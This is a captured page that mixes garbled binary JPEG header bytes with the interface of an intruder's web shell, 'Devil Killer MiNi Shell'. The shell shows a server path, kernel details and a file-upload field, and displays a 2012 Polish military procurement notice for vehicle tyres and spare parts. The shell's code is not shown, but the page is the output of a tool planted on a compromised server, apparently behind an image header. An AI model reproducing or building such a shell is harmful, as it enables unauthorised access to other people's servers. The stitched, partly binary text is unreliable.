JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/393716-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa ogumienia oraz części zamiennych do pojazdów samochodowych</b><br>
<b>Numer ogłoszenia: 393716 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4226 , Ul. Marsa 110, 04-470 Warszawa, woj. mazowieckie, tel. 22 6815 030, faks 22 6815 093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.2rblog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa - podsektor rządowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa ogumienia oraz części zamiennych do pojazdów samochodowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa ogumienia oraz części zamiennych do pojazdów samochodowych z podziałem na 10 części (zadań): 
Zadanie nr 1 - dostawa części zamiennych do pojazdów marki STAR 266/JELCZ,
Zadanie nr 2 - dostawa części zamiennych do pojazdu marki TARPAN/HONKER silnik Andoria,
Zadanie nr 3 - dostawa części zamiennych do pojazdu marki TARPAN/HONKER silnik Andoria,
Zadanie nr 4 - dostawa części zamiennych do pojazdu marki TARPAN/HONKER silnik Andoria,
Zadanie nr 5 - dostawa części zamiennych do pojazdu marki STAR 200/266,
Zadanie nr 6 - dostawa części zamiennych do pojazdu marki STAR 200/266,
Zadanie nr 7 - dostawa części zamiennych do pojazdu marki STAR 200/266,
Zadanie nr 8 - dostawa części zamiennych do pojazdu marki LUBLIN silnik Andoria,
Zadanie nr 9 - dostawa ogumienia do pojazdów kołowych,
Zadanie nr 10 - dostawa specjalistycznych kół z wkładami dojazdowymi
Szczegółowy opis i ilości przedstawia załącznik nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga zabezpieczenia oferty wadium. Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieśc  wadium w łącznej wysokości 
7 600,00 PLN (słownie: siedem tysięcy sześćset złotych), w tym na:
zadanie 1 - 1 100,00 PLN (słownie: jeden tysiąc sto złotych);
zadanie 2 - 400,00 PLN (słownie: czterysta złotych);
zadanie 3 - 450,00 PLN (słownie: czterysta pięćdziesiąt złotych);
zadanie 4 - 1 100,00 PLN (słownie: jeden tysiąc sto złotych);
zadanie 5 - 1 100,00 PLN (słownie: jeden tysiąc sto złotych);
zadanie 6 - 550,00 PLN (słownie: pięćset pięćdziesiąt złotych);
zadanie 7 - 800,00 PLN (słownie: osiemset złotych);
zadanie 8 - 300,00 PLN (słownie: trzysta złotych);
zadanie 9 - 700,00 PLN (słownie: siedemset złotych);
zadanie 10 - 1 100,00 PLN (słownie:  jeden tysiąc sto złotych);
Wykonawca składający ofertę na wybrane zadania dokonuje wpłaty wadium w wysokości wyszczególnionej dla poszczególnych zadań (części)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia w załączniku nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum 1 (jedną) dostawę, odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia z podaniem wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie, np. referencje. Wartość każdej (pojedynczej) dostawy winna być nie mniejsza niż:
na zadanie 1 - 35 000,00 zł;
na zadanie 2 - 12 000,00 zł
na zadanie 3 - 14 500,00 zł;
na zadanie 4 - 35 000,00 zł
na zadanie 5 - 35 000,00 zł;
na zadanie 6 - 17 500,00 zł
na zadanie 7 - 25 000,00 zł;
na zadanie 8 -    9 500,00 zł
na zadanie 9 - 22 500 ,00 zł;
na zadanie 10 - 34 000,00 zł
UWAGA !
 Jeżeli Wykonawca składa ofertę na kilka części (zadań) jednocześnie, a na potwierdzenie spełnienia warunku posiada jedną dostawę (oraz np. referencje), wartość tej dostawy winna być nie mniejsza niż łączna wartość części (zadań) na które składana jest oferta. 
W przypadku świadczeń okresowych lub ciągłych, wartość wykonanej dostawy musi odpowiadać co najmniej kwocie zadania, na które Wykonawca składa ofertę.
Za dostawy tego samego rodzaju zamawiający uzna dostawy przedmiotów 
o przeznaczeniu i funkcji tożsamej z przedmiotem zamówienia.
W przypadku wartości dostaw wyrażonej w innej walucie, Zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu z dnia zawarcia umowy na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej:
 http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia w załączniku nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż łącznie 240 000,00 pln, w tym:
na zadanie 1 - 35 000,00 zł;
na zadanie 2 - 12 000,00 zł
na zadanie 3 - 14 500,00 zł;
na zadanie 4 - 35 000,00 zł
na zadanie 5 - 35 000,00 zł;
na zadanie 6 - 17 500,00 zł
na zadanie 7 - 25 000,00 zł;
na zadanie 8 -    9 500,00 zł
na zadanie 9 - 22 500 ,00 zł;
na zadanie 10 - 34 000,00 zł
UWAGA
Jeżeli Wykonawca składa ofertę na kilka części (zadań) jednocześnie, na potwierdzenie spełnienia niniejszego warunku, winien wykazać wartość posiadanych środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż łączna wartość części (zadań) na które składana jest oferta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Zgodnie z art. 25 ust.1, pkt.2 ustawy z dnia  29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. 2007 r., Nr 223, poz. 1655, z późn.zm.), Wykonawca winien przedłożyć oświadczenia lub dokumenty potwierdzające spełnianie zgodności oferowanych dostaw z wymaganiami określonymi przez Zamawiającego,
Do potwierdzenia spełnienia tego warunku do oferty należy załączyć:
1.1. Aktualną homologację wydaną na podstawie Regulaminu EKG ONZ nr 30 lub 54 w zależności wg jakiego z w/w regulaminów winno być homologowane dane ogumienie: dotyczy zadań 9 i 10  przetłumaczoną na język polski</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp, w przypadkach niezależnych od Zamawiającego, zastrzega się dokonanie zmian treści umowy  w zakresie:
1.1. terminu realizacji umowy;
1.2. okresu świadczenia - a tym samym ilości przewidzianych w ofercie (adekwatnym do planowanego terminu w przypadkach świadczeń okresowych);
1.3. zmiany miejsca świadczenia;
2. Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie pisemnej (aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.2rblog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - ul. Marsa 110, 04-470 Warszawa, budynek nr 2 pok. nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2012 godzina 08:00, miejsce: Siedziba Zamawiającego - ul. Marsa 110, 04-470 Warszawa, Kancelaria ogólna - budynek nr 3, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa części zamiennych do pojazdu marki STAR 266/JELCZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu  części zamiennych do pojazdu marki STAR 266/JELCZ:
1. Amortyzator AMSTRONG (289.1.35.00) Star 266 - szt. 14
2. Bęben hamulca 605-002-05-040 podwozie D-46 - szt. 10
3. Bęben hamulca (467.45.023) do Star 266 - szt. 12
4. Cylinder hamulcowy CHDR3-44 (środek i tył Star 266) - szt. 16
5. Czujnik ciśnienia oleju FCSC - szt. 10
6. Dyszel przyczepy podwozia D-46 z dużym uchem do zaczepów hakowych z atestem - szt. 6
7. Fartuch przeciwbłotny przyczepy D-46 - szt.	40
8. Łożysko piasty 32210 podwozie D-46 - szt. 20
9. Łożysko piasty 32211A podwozie D-46 - szt.	20
10. Nakrętka M10 - kg 10
11. Nakrętka M18x1,5 szpilki koła podwozie D-46 - szt. 50
12. Okładzina szczęk hamulcowych Star 200 - szt. 20
13. Okno odwietrzniak lewe 641.15.201 - szt. 4
14. Okno odwietrznika prawe 641.15.202 - szt. 4
15. Pierścień uszczelniający 19x27x6 Simering - szt. 20
16. Pompa sprzęgła PHS 2-19 - szt. 5
17. Przegub kulowy 444.29.271 z atestem - szt. 20
18. Przegub kulowy 444.29.272 z atestem - szt. 20
19. Przewód harmonijkowy chłodnicy gumowy Star (łączący wlew z chłodnicą) - szt. 10
20. Przewód olejowy sprężarki Star 359.18.237 - szt. 5
21. Przewód olejowy zbrojony fi 12 Star - szt. 5
22. Przewód ściekowy sprężarki 338.18.210 - szt. 5
23. Sworzeń 444.14.118 (wieszaka Star 266) - szt. 16
24. Sworzeń dyszla przyczepy podwozie D46 (CP4)  - szt. 14
25. Sworzeń resoru przyczepy D-46 - szt. 20
26. Sworzeń resoru Star 266 - szt. 40
27. Sworzeń szczęki przyczepy D-46 - szt. 50
28. Szczęka hamulca kpl. 631.246.0413 - szt. 20
29. Szczęki hamulca podwozia D-46 - szt. 8
30. Szpilka koła podwozia D-46 - szt. 50
31. Śruba zwykła z łbem sześciokątnym M10 x 70 - kg 10
32. Tuleja resoru ( 436.14.008) Star 266  - szt.	30
33. Tuleja wieszaka (436.14.009) Star 266 - szt. 30
34. Ucho dyszla przyczepy D-46 do zaczepu hakowego (duże) z atestem - szt. 6
35 - Wkład reflektora  0223.8.001.2 - szt. 40
36. Wkład reflektora do jelcz RE.03411.H4 - szt.  20
37. Reflektor przedni kpl Jelcz 325 okrągły - szt.	 20
38. Chłodnica wody J-662 z silnikiem Stayer - szt. 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa części zamiennych  do pojazdu marki TARPAN/HONKER silnik Andoria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nize wymienionego asortynentu części zamiennych  do pojazdu marki TARPAN/HONKER silnik Andoria:
1.PODUSZKA ZAWIESZENIA 701683921 - szt. 8
2. PODPORA WAŁU KPL. 779057597 -  szt. 8
3. AMORTYZATOR PRZEDNIEGO ZAW. 700000032 - szt. 16
4. AMORTYZATOR 700000033 - szt. 14
5. WAŁ NAPĘDOWY DZIELONY -szt. 6
6. MECHANIZM BLOKADY TYLNEGO MOSTU  - kpl 4
7. TARCZA SPRZĘGŁA 779057964 - szt. 4
8. WAŁ NAPĘDOWY KRÓTKI - szt. 5
9. PIERŚCIEŃ DOC.SPRZĘGŁA HONKER 689100S/24 - szt. 10
10. TARCZA SPRZĘGŁA - szt. 4
11. LINKA SPRZĘGŁA 4CT90 - szt. 6
12. PRZEGUB KULOWY (LEWY)  - szt. 14
13. PRZEGUB KULOWY (PRAWY)  - szt. 14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa części zamiennych do pojazdu marki TARPAN/HONKER silnik Andoria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu części zamiennych do pojazdu marki TARPAN/HONKER silnik Andoria:
1. SZCZĘKA HAMULCOWA Z REG. 782015122 - szt. 26
2. SZCZĘKA HAMULCOWA Z REG. 782015123 - szt. 26
3. SZCZĘKA HAMULCOWA Z REG. 782015123 - szt. 26
4. TARCZA HAM.TYLNA ZE SZCZĘKAMI 779057839 - szt. 28
5. HYDR.CYLINDER ROZPIERAJĄCY 779055934 - szt. 10
6. POMPA HAMULCOWA KPL.779058900 - szt. 12
7. POMPA PODCIŚNIENIOWA KPL. 389999998700 - szt. 12
8. SERWO HAM.HONKER 1-66000/C - szt. 8
9. SZCZĘKA HAM.HONKER 17-3501090 - szt. 20
10. SERWO HAMULCOWE HONKER 329-48-004 - szt. 6
11. SZCZĘKA HAM.TYLNA P.HONKER 782015124 - szt. 30
12. SZCZĘKA HAM.TYLNA L.HONKER 782015125	 - szt. 30
13. POMPA HAM.Z SERWEM HONKER 779057174 -  szt. 28.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa części zamiennych do pojazdu marki TARPAN/HONKER silnik Andoria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu części zamiennych do pojazdu marki TARPAN/HONKER silnik Andoria:
1.MECHANIZM NAPĘDOWY - szt. 5
2. LUSTERKO ZEWNĘTRZNE  - szt. 10
3. PIÓRO WYCIERAKA - szt. 40
4. LUSTERKO WEWNĘTRZNE - szt. 6
5. ZAWÓR NAGRZEWNICY HONKER - szt. 6
6. LUSTERKO PRAWE - szt. 6
7. LUSTERKO LEWE - szt. 6
8. POMPA OLEJU  - KPL -szt. 4
9. TŁUMIK DRGAŃ - szt. 8
10. ZESTAW NAPRAWCZY SILNIKA - kpl 4
11. ROZPYLACZ DNOSD 256A 2- szt. 4
12. POMPA ZASILAJĄCA - szt. 8
13. WTRYSKIWACZ KPL. - szt. 28
14. WYŁĄCZNIK ZAPŁONU - szt. 2
15. STEROWNIK ŚWIEC ŻAROWYCH - szt. 8
16. ALTERNATOR 12V - szt. 4
17. ROZRUSZNIK ELEKT.12V HONKER - szt. 4
18. ELEKTROWŁ.ROZRUSZNIKA HONKER - szt. 6
19. ALTERNATOR SILNIKA TARPAN - szt. 4
20. ROZRUSZNIK - szt. 3
21. REGULATOR NAPIĘ.ALTER.HONKER	- szt. 8
22. ALTERNATOR SILNIKA TARPAN - szt. 4
23. CHŁODNICA OLEJU - szt.	4
24. POMPA WODY-KPL. - szt. 4
25. WENTYLATOR UKŁ.CHŁ.HONKER - szt. 2
26. WENTYLATOR 11-ŁOPAT.HONKER - szt. 2
27. CHŁODNICA WODY HONKER - szt. 2
28. TURBOSPRĘŻARKA SILN.TARPAN - szt. 5
29. TURBOSPRĘŻARKA 4CT90 MAŁA - szt. 6
30.TŁUMIK  WYDECHU - szt. 2
31. TŁUMIK - kpl 6
32. PASEK KLINOWY 1A 800 - szt. 10
33. PASEK KLINOWY 10X800 - szt. 10
34. PASEK KLINOWY AVX 10X950 - szt. 10
35. ŁOŻYSKO WYŁ.SPRZĘGŁO KPL - szt. 6
36. ŁOŻYSKO PÓŁOSI KPL. - szt. 4
37. ŁOŻYSKO WYSIKOWE SPRZGŁA - szt. 2
38. TULEJKA STABIL.HONKER - szt. 6
39. ELEKTROZAWÓR POMPY HONKER - szt. 4
40. ZAWÓR ELEKTROPNEUMAT.HONKER - szt. 6
41. ELEKTROZAW.POMPY WTR.HONKER - szt. 6
42. USZCZELKA NASADY GŁOWICY - szt. 16
43. USZCZELKA NASADY GŁOWICY - szt. 16
44. ZESTAW USZCZELNIEŃ SILNIKA - kpl. 10
45. NAPINACZ PASKA ROZRZĄDU - szt. 6
46.CIĘGŁO SPRZĘGŁA - szt. 4
47.CIĘGNO STER.SPRZĘGŁEM HONKER - szt. 6
48. ROLKA NAPINACZ PASKA POMPY - szt. 6
49. PRZEKAŹNIK ROZRUCHOWY - szt. 20
50. URZĄDZENIE MIKROPROCESOROWE - szt. 7
51. SILNIK KOREKTORA ŚWIATEŁ - szt. 10
52. CZUJNIK TEMP.W0DY HONKER - szt. 8
53. PASEK ROZRZĄDU - szt. 6
54. ZBIORNIK PALIWA - szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
